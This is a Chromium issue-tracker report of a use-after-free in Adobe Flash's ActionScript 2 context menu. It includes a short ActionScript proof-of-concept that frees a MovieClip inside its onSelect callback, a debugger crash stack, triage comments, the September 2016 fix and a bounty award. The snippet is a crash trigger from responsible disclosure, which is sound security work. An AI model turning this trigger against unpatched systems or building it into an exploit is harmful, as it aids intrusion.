Issue metadata
Sign in to add a comment
|
Security: Adobe Flash ContextMenu Use After Free
Reported by
xiong12...@gmail.com,
Jun 22 2016
|
|||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
This is a use after free bug when using Action Script 2 context menu.
By setting a MovieClip object as the ContextMenu and free the object in a callback function, we can cause the MovieClip object to be reused after it is freed.
var mc = this.createEmptyMovieClip("mc", 0);
mc.onSelect = function(){
trace(233);
_root.removeMovieClip.call(mc);
}
_root.menu = mc;
VERSION
Chrome Version: 52.0.2743.41 beta-m (64-bit)
Operating System: Windows 7 en
REPRODUCTION CASE
To reproduce the case, open "TestContextMenu.swf" in chrome, then right-click the mouse to observe the crash.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
(1430.1a5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`00000000 ?? ???
0:000> k
Child-SP RetAddr Call Site
00000000`0025ccd8 000007fe`d3dade34 0x0
00000000`0025cce0 000007fe`d3db1550 pepflashplayer!PPP_ShutdownBroker+0x24c884
00000000`0025ce10 000007fe`d3db331e pepflashplayer!PPP_ShutdownBroker+0x24ffa0
00000000`0025cf30 000007fe`d3b72704 pepflashplayer!PPP_ShutdownBroker+0x251d6e
00000000`0025d030 000007fe`d3b750ce pepflashplayer!PPP_ShutdownBroker+0x11154
00000000`0025d070 000007fe`d3b6ce4b pepflashplayer!PPP_ShutdownBroker+0x13b1e
00000000`0025d320 000007fe`d3b6cf31 pepflashplayer!PPP_ShutdownBroker+0xb89b
00000000`0025d380 000007fe`d3b6c3bc pepflashplayer!PPP_ShutdownBroker+0xb981
00000000`0025d3b0 000007fe`d95e5f30 pepflashplayer!PPP_ShutdownBroker+0xae0c
00000000`0025d3e0 000007fe`d9a1afd7 chrome_child!ChromeMain+0x7015d4
00000000`0025d410 000007fe`d9a1b196 chrome_child!ChromeMain+0xb3667b
00000000`0025d510 000007fe`d95e6327 chrome_child!ChromeMain+0xb3683a
00000000`0025d560 000007fe`d95e66ea chrome_child!ChromeMain+0x7019cb
00000000`0025d590 000007fe`d7a8fa64 chrome_child!ChromeMain+0x701d8e
00000000`0025d5c0 000007fe`d7a47e0f chrome_child!GetHandleVerifier+0x49d44
00000000`0025d6b0 000007fe`d7a48db2 chrome_child!GetHandleVerifier+0x20ef
00000000`0025e9c0 000007fe`d7a91450 chrome_child!GetHandleVerifier+0x3092
00000000`0025eeb0 000007fe`d7a911ad chrome_child!GetHandleVerifier+0x4b730
00000000`0025ef10 000007fe`d7a470e1 chrome_child!GetHandleVerifier+0x4b48d
00000000`0025ef60 000007fe`d9d505e2 chrome_child!GetHandleVerifier+0x13c1
Credit:
Yuki Chen of Qihoo 360Vulcan Team
,
Jun 23 2016
Absolutely, I'll report this now!
,
Jun 23 2016
This is PSIRT-5524
,
Jun 24 2016
,
Jun 24 2016
,
Jun 24 2016
,
Jul 8 2016
natashenka: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Jul 13 2016
,
Jul 13 2016
,
Jul 21 2016
,
Jul 22 2016
natashenka: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Aug 2 2016
natashenka: any updates here? Thanks!
,
Aug 11 2016
,
Sep 1 2016
,
Sep 22 2016
Fixed in the September update
,
Sep 23 2016
,
Sep 23 2016
,
Sep 25 2016
,
Sep 26 2016
Your change meets the bar and is auto-approved for M54 (branch: 2840)
,
Oct 7 2016
Nothing to merge here.
,
Oct 10 2016
,
Oct 11 2016
Congratulations, the panel has awarded you $3,000 for this bug!
,
Oct 11 2016
,
Dec 30 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
||||||||||||||||||||||
►
Sign in to add a comment |
||||||||||||||||||||||
Comment 1 by dominickn@chromium.org
, Jun 23 2016Owner: natashenka@google.com
Status: Assigned (was: Unconfirmed)